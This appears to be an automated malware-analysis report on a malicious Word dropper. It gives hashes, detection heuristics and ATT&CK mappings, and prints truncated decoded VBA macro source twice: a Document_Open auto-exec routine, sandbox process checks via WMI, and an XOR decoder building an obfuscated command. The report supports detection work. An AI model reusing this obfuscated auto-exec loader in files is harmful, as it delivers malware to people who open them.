Office (OLE) malware analysis — malicious · 005aef3422110f3e

MALICIOUS

Office (OLE)

630.0 KB Created: 2018-03-12 18:16:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: d631d42ceb3cce6374a60ae457040bb9 SHA-1: 3b1ecb0969fda62162757c2cf3ed8d189ac83184 SHA-256: 005aef3422110f3e0a60dee4efe6c5db371ca34eba400f32909e3780813dfec8

382 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing obfuscated VBA macros. The Document_Open macro is designed to execute a payload using WMI's Win32_Process launcher. The document body explicitly instructs the user to 'Enable Content' to view the document, acting as a lure. The VBA script attempts to check for existing processes like 'VmRemoteGuest.exe' and 'tee.exe' before proceeding with execution.

Heuristics 10

ClamAV: Doc.Dropper.Agent-6472163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6472163-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35623 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	35623 bytes
SHA-256: `66610eea1c4af73ec17005bb6ffbfe1c2b3bd18a7592897abbd79f6323d8a639`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If ActiveDocument.Variables("wykYqM").Value <> "juryt" And Not gKelhjy("VmRemoteGuest.exe") And Not gKelhjy("tee.exe") Then egsdDwwbNSzoBn ActiveDocument.Variables("wykYqM").Value = "juryt" If ActiveDocument.ReadOnly = False Then ActiveDocument.Save End If End If End Sub Private Function gKelhjy(prfs As String) As Boolean Dim ugkFg As Object Dim uSgjr As Variant Dim iegL As Object Set ugkFg = GetObject("winmgmts:") Set uSgjr = ugkFg.ExecQuery("Select * from Win32_Process Where Name = '" & prfs & "'") If uSgjr.Count > 0 Then gKelhjy = True Else gKelhjy = False End If End Function Attribute VB_Name = "NzhDVXC" Private Function WPltBqWOab(OVnsChUfpQ As Variant, ngWwQXAxlZ As Integer) Dim deKfLHDMwm, TruprARwhy As String, mJicZEAwmC, ydNFxXqQSc TruprARwhy = ActiveDocument.Variables("wykYqM").Value() deKfLHDMwm = "" mJicZEAwmC = 1 While mJicZEAwmC < UBound(OVnsChUfpQ) + 2 ydNFxXqQSc = mJicZEAwmC Mod Len(TruprARwhy): If ydNFxXqQSc = 0 Then ydNFxXqQSc = Len(TruprARwhy) deKfLHDMwm = deKfLHDMwm + Chr(Asc(Mid(TruprARwhy, ydNFxXqQSc + ngWwQXAxlZ, 1)) Xor CInt(OVnsChUfpQ(mJicZEAwmC - 1))) mJicZEAwmC = mJicZEAwmC + 1 Wend WPltBqWOab = deKfLHDMwm End Function #If Mac Then #If VBA7 Then Private Declare PtrSafe Function system Lib WPltBqWOab ( Array ( 54,63,16,23,94,61,3,41,30,5 ), 5318 ) (ByVal command As String) As Long #Else Private Declare Function system Lib WPltBqWOab ( Array ( 54,63,16,23,94,61,3,41,30,5 ), 5318 ) (ByVal command As String) As Long #End If #End If Public Function adJhgtmGDG() Dim pbRq As String pbRq = WPltBqWOab(Array(12, 19, 96, 57, 11, 64, 8, 72, 2, 44, 2, 101, 26, 8, 70, 59, 21, 9, 117, 32, 42, _ 28, 50, 23, 42, 121, 60, 59, 124, 45, 31, 51, 18, 30, 21, 62, 55, 54, 31, 31, 1, _ 16, 32, 0, 123, 124, 0, 17, 33, 21, 65, 14, 9, 8), 4004) pbRq = pbRq + WPltBqWOab(Array(90, 60, 16, 15, 96, 47, 18, 54, 29, 51, 35, 53, 80, 115, 8, 29, 28, 19, 17, 55, 3, _ 22, 28, 9, 80, 11, 43, 66, 83, 97, 45, 12, 91, 5, 61, 65, 2, 98, 39, 84, 12, _ 69, 27, 94, 92, 2, 86, 57), 3906) pbRq = pbRq + WPltBqWOab(Array(30, 45, 92, 17, 111, 62, 18, 42, 61, 3, 42, 109, 37, 1, 2, 13, 78, 35, 32, 0, 107, _ 29, 91, 65, 95, 15, 1, 70, 95, 124, 18, 10, 59, 69, 62, 44, 91, 8, 9, 107, 15, _ 21, 31, 30, 120, 56, 14, 42), 1799) pbRq = pbRq + WPltBqWOab(Array(102, 43, 13, 31, 102, 35, 62, 0, 93, 74, 9, 12, 19, 39, 59, 41, 43, 95, 60, 45, 10, _ 1, 80, 120, 4, 95, 105, 109, 32, 123, 57, 13, 4, 24, 83, 53, 48, 67, 85, 43, 56, _ 10, 17, 56, 37, 60, 42, 15), 1451) pbRq = pbRq + WPltBqWOab(Array(120, 127, 10, 45, 54, 47, 82, 116, 57, 29, 0, 87, 120, 90, 107, 116, 86, 24, 34, 48, 82, _ 54, 29, 32, 9, 9, 38, 122, 97, 8, 104, 39, 47, 75, 8, 32, 60, 72, 110, 51, 54, _ 51, 102, 115, 63, 121, 38, 15), 4758) pbRq = pbRq + WPltBqWOab(Array(9, 45, 13, 39, 123, 98, 49, 5, 25, 86, 0, 94, 86, 29, 3, 48, 22, 3, 8, 55, 30, _ 63, 121, 25, 8, 118, 33, 55, 21, 30, 8, 107, 45, 34, 22, 91, 123, 12, 3, 10, 68, _ 85, 55, 105, 61, 37, 49, 112), 3512) pbRq = pbRq + WPltBqWOab(Array(57, 19, 51, 67, 61, 13, 58, 56, 67, 6, 24, 69, 27, 52, 35, 26, 49, 58, 36, 59, 40, _ 32, 120, 45, 22, 45, 3, 27, 2, 68, 34, 44, 19, 19, 81, 6, 44, 66, 58, 36, 62, _ 121, 63, 38, 1, 118, 42, 19), 0) pbRq = pbRq + WPltBqWOab(Array(93, 25, 40, 26, 44, 46, 15, 60, 14, 48, 109, 27, 56, 0, 36, 28, 37, 46, 103, 63, 45, _ 22, 6, 23, 94, 4, 85, 57, 25, 99, 19, 47, 59, 73, 33, 7, 122, 123, 17, 119, 86, _ 94, 82, 113, 96, 79, 62, 96), 2622) pbRq = pbRq + WPltBqWOab(Array(116, 12, 126, 15, 13, 122, 57, 56, 56, 12, 16, 64, 51, 56, 53, 80, 29, 66, 25, 9, 38, _ 63, 6, 11, 9, 15, 36, 39, 4, 29, 47, 39, 12, 47, 26, 10, 31, 63, 58, 107, 53, _ 91, 22, 28, 55, 10, 35, 5), 1007) pbRq = pbRq + WPltBqWOab(Array(4, 2, 11, 47, 33, 125, 5, 62, 48, 2 ... (truncated)

SHA-256: 66610eea1c4af73ec17005bb6ffbfe1c2b3bd18a7592897abbd79f6323d8a639

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wykYqM").Value <> "juryt" And Not gKelhjy("VmRemoteGuest.exe") And Not gKelhjy("tee.exe") Then
egsdDwwbNSzoBn
ActiveDocument.Variables("wykYqM").Value = "juryt"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub

Private Function gKelhjy(prfs As String) As Boolean
Dim ugkFg As Object
Dim uSgjr As Variant
Dim iegL As Object
Set ugkFg = GetObject("winmgmts:")
Set uSgjr = ugkFg.ExecQuery("Select * from Win32_Process Where Name = '" & prfs & "'")
If uSgjr.Count > 0 Then
gKelhjy = True
Else
gKelhjy = False
End If
End Function

Attribute VB_Name = "NzhDVXC"
Private Function WPltBqWOab(OVnsChUfpQ As Variant, ngWwQXAxlZ As Integer)
Dim deKfLHDMwm, TruprARwhy As String, mJicZEAwmC, ydNFxXqQSc
TruprARwhy = ActiveDocument.Variables("wykYqM").Value()
deKfLHDMwm = ""
mJicZEAwmC = 1
While mJicZEAwmC < UBound(OVnsChUfpQ) + 2
ydNFxXqQSc = mJicZEAwmC Mod Len(TruprARwhy): If ydNFxXqQSc = 0 Then ydNFxXqQSc = Len(TruprARwhy)
deKfLHDMwm = deKfLHDMwm + Chr(Asc(Mid(TruprARwhy, ydNFxXqQSc + ngWwQXAxlZ, 1)) Xor CInt(OVnsChUfpQ(mJicZEAwmC - 1)))
mJicZEAwmC = mJicZEAwmC + 1
Wend
WPltBqWOab = deKfLHDMwm
End Function
#If Mac Then
#If VBA7 Then
Private Declare PtrSafe Function system Lib WPltBqWOab ( Array ( 54,63,16,23,94,61,3,41,30,5 ), 5318 ) (ByVal command As String) As Long
#Else
Private Declare Function system Lib WPltBqWOab ( Array ( 54,63,16,23,94,61,3,41,30,5 ), 5318 ) (ByVal command As String) As Long
#End If
#End If

Public Function adJhgtmGDG()
Dim pbRq As String
pbRq = WPltBqWOab(Array(12, 19, 96, 57, 11, 64, 8, 72, 2, 44, 2, 101, 26, 8, 70, 59, 21, 9, 117, 32, 42, _
28, 50, 23, 42, 121, 60, 59, 124, 45, 31, 51, 18, 30, 21, 62, 55, 54, 31, 31, 1, _
16, 32, 0, 123, 124, 0, 17, 33, 21, 65, 14, 9, 8), 4004)
pbRq = pbRq + WPltBqWOab(Array(90, 60, 16, 15, 96, 47, 18, 54, 29, 51, 35, 53, 80, 115, 8, 29, 28, 19, 17, 55, 3, _
22, 28, 9, 80, 11, 43, 66, 83, 97, 45, 12, 91, 5, 61, 65, 2, 98, 39, 84, 12, _
69, 27, 94, 92, 2, 86, 57), 3906)
pbRq = pbRq + WPltBqWOab(Array(30, 45, 92, 17, 111, 62, 18, 42, 61, 3, 42, 109, 37, 1, 2, 13, 78, 35, 32, 0, 107, _
29, 91, 65, 95, 15, 1, 70, 95, 124, 18, 10, 59, 69, 62, 44, 91, 8, 9, 107, 15, _
21, 31, 30, 120, 56, 14, 42), 1799)
pbRq = pbRq + WPltBqWOab(Array(102, 43, 13, 31, 102, 35, 62, 0, 93, 74, 9, 12, 19, 39, 59, 41, 43, 95, 60, 45, 10, _
1, 80, 120, 4, 95, 105, 109, 32, 123, 57, 13, 4, 24, 83, 53, 48, 67, 85, 43, 56, _
10, 17, 56, 37, 60, 42, 15), 1451)
pbRq = pbRq + WPltBqWOab(Array(120, 127, 10, 45, 54, 47, 82, 116, 57, 29, 0, 87, 120, 90, 107, 116, 86, 24, 34, 48, 82, _
54, 29, 32, 9, 9, 38, 122, 97, 8, 104, 39, 47, 75, 8, 32, 60, 72, 110, 51, 54, _
51, 102, 115, 63, 121, 38, 15), 4758)
pbRq = pbRq + WPltBqWOab(Array(9, 45, 13, 39, 123, 98, 49, 5, 25, 86, 0, 94, 86, 29, 3, 48, 22, 3, 8, 55, 30, _
63, 121, 25, 8, 118, 33, 55, 21, 30, 8, 107, 45, 34, 22, 91, 123, 12, 3, 10, 68, _
85, 55, 105, 61, 37, 49, 112), 3512)
pbRq = pbRq + WPltBqWOab(Array(57, 19, 51, 67, 61, 13, 58, 56, 67, 6, 24, 69, 27, 52, 35, 26, 49, 58, 36, 59, 40, _
32, 120, 45, 22, 45, 3, 27, 2, 68, 34, 44, 19, 19, 81, 6, 44, 66, 58, 36, 62, _
121, 63, 38, 1, 118, 42, 19), 0)
pbRq = pbRq + WPltBqWOab(Array(93, 25, 40, 26, 44, 46, 15, 60, 14, 48, 109, 27, 56, 0, 36, 28, 37, 46, 103, 63, 45, _
22, 6, 23, 94, 4, 85, 57, 25, 99, 19, 47, 59, 73, 33, 7, 122, 123, 17, 119, 86, _
94, 82, 113, 96, 79, 62, 96), 2622)
pbRq = pbRq + WPltBqWOab(Array(116, 12, 126, 15, 13, 122, 57, 56, 56, 12, 16, 64, 51, 56, 53, 80, 29, 66, 25, 9, 38, _
63, 6, 11, 9, 15, 36, 39, 4, 29, 47, 39, 12, 47, 26, 10, 31, 63, 58, 107, 53, _
91, 22, 28, 55, 10, 35, 5), 1007)
pbRq = pbRq + WPltBqWOab(Array(4, 2, 11, 47, 33, 125, 5, 62, 48, 2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.